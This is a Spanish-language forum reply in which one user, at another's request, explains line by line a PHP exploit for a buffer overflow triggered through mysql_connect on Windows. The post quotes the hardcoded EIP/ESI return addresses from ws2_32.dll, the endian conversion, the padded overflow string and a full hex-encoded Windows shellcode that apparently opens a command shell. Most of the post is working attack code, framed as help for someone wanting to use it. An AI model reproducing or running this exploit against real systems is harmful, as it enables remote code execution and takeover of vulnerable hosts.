Desde linux se puede explotar igualmente, es un PHP. Lo que dice ahí es "quién" es vulnerable.
![Cita](images/bluesaint/misc/quote_icon.png)
Iniciado por
cypress
por eso dije creo. pero... me pueden ayudar? no pido paso por paso, pero orientenme y yo busco
cypress, no tienes que buscar nada. Está ahí todo.
Trataré de explicarlo paso a paso (disculpad mis errores):
Código:
$eip = "71AB5651"; //EIP - CALL ESI from Winsock 2.0 ws2_32.dll v5.1.2600.0
No hace falta explicar mucho, traduciendo dice:"EIP - Llama a ESI desde Winsock 2.0 ws2_32.dll
Código:
$esi = "10000000"; //ESI - Temporary. The memory under this location will be trashed.
También está bastante claro: "ESI - Temporalmente. Lo memorizado en este región de memoria será desechado".
Código:
$shellcode = pack("H*","fc6aeb4de8f9ffffff608b6c24248b453c8b7c057801ef8b4f 188b5f2001eb498b348b01ee31c099ac84c07407c1ca0d01c2 ebf43b54242875e58b5f2401eb668b0c4b8b5f1c01eb032c8b 896c241c61c331db648b43308b400c8b701cad8b40085e688e 4e0eec50ffd6665366683332687773325f54ffd068cbedfc3b 50ffd65f89e56681ed0802556a02ffd068d909f5ad57ffd653 5353535343534353ffd06668115c665389e19568a41a70c757 ffd66a105155ffd068a4ad2ee957ffd65355ffd068e5498649 57ffd650545455ffd09368e779c67957ffd655ffd0666a6466 68636d89e56a505929cc89e76a4489e231c0f3aafe422dfe42 2c938d7a38ababab6872feb316ff7544ffd65b57525151516a 0151515551ffd068add905ce53ffd66affff37ffd08b57fc83 c464ffd652ffd068efcee06053ffd6ffd0");
Es el shellcode que se ejecutará al explotar la vulnerabilidad.
Código:
//Endian conversion
$eip = substr($eip, 6, 2) . substr($eip, 4, 2) . substr($eip, 2, 2) . substr($eip, 0, 2);
$esi = substr($esi, 6, 2) . substr($esi, 4, 2) . substr($esi, 2, 2) . substr($esi, 0, 2);
http://es.wikipedia.org/wiki/Big-endian
Código:
$overflowstring = "localhost:/";
$overflowstring .= "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX ";
$overflowstring .= pack("H*",$eip); //EIP
$overflowstring .= pack("H*",$esi); //ESI
$overflowstring .= "/";
Crea la variable $overflowstring a la que va añadiendo todo lo necesario para el funcionamiento del exploit
Código:
mysql_connect($overflowstring, $shellcode);
Realiza la petición al servidor, desbordando la memoria y haciendo que se ejecute el shellcode.
Salu2
Marcadores